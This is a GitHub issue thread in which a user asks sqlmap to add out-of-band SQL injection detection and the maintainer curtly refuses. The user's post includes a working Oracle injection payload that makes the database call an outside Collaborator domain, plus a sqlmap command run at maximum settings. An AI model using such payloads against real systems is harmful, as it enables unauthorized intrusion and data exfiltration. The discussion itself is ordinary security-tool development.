### ISSUE TITLE
Adding Out of Band (OOB) detection technique

### ISSUE THREAD

**Issue by Hipapheralkus** [sqlmapproject/sqlmap#5518]
My ticket https://github.com/sqlmapproject/sqlmap/issues/5516 was completely misunderstood and closed without a possibility of making comments. Let me rephrase the ticket.

I'd like SQLmap to introduce Out of Band SQLi scanning technique. In case we already have access to a DNS server, in the cases when `--dns-domain` switch can be used; the SQLmap could enhance scanning for Out of Band traffic.

At the moment, the switch can only be used for DNS exfiltration, but not for **discovering** SQL injection. 

So, if there is SQL injection possible on the backend server; but is not found by the highest setting (without WAF present) `sqlmap -r request.txt --level=5 --risk=3 --os=linux --dbms=oracle`, we are currently out of luck.
Whereas, if the  `--dns-domain` could be enhanced to allow for discovery phase too, not only exfiltration, then we would be lucky. Following manual SQL injection payload has been used in the real application and worked, but has not been detected by other tools: `1'AND+utl_http.request('ezhua896c8acttjqj817fmg32u8lwbk0.oastify.com')='1'--`. After this has been sent to the server; we've received DNS and HTTP request to the domain. 

Indeed, this specific use case is a very easy Burp Suite Professional feature, but my request has nothing to do with Burp Suite as a solution. I've only demonstrated a working payload for Collaborator domain.

And to complete closing comment on the ticket -> Burp Suite would never have discovered it without the Infiltrator, which is not easy to deploy. Even Burp Suite, or SQLmap were unable to find this OOB SQLi. Therefor, I'd like to request improvement of SQLmap tool to cover such use-cases when DNS is supplied.

I hope it makes more sense.

**Comment by stamparm** [comment]
Users already have problems setting up the infrastructure first DNS
exfiltration, and you would like the --dns-domain to be expanded.

Out of curiosity, before I close this ticket when I get to the laptop. Do
you have your infrastructure ready or you just want a feature?

**Comment by stamparm** [comment]
Trivialising stuff will always result with a closed ticket. Have you
wondered if there is any scenario where at least time based SQLi is not
working, while DNS exfil works? Also, I would bet that you even haven't
researched 5 minutes on how to setup DNS exfil environment. You've just
seen that you data happily went to some vendor, without thinking pf
potential security concerns of such action.

Will close this issue in half an hour. Just please give me time to come to
the computer

**Comment by Hipapheralkus** [comment]
Indeed since sql map is used for web pentesting, I reckon many people are already aware and are using Burp Suite Professional. It has a functionality of using Collaborator server very easily and free of any additional charge. And the extension I've mentioned in my previous ticket nicely ties this out of the box DNS functionality into SQLmap --dns-domain.

So yes, I have the infrastructure ready as many other people who use Burp Suite Pro

**Comment by stamparm** [comment]
That's not you infrastructure. sqlmap requires usage of its infrastructure
the same way as Burp requires usage of its own. Please, don't raise any
issues here any more and go to your Burp Suite
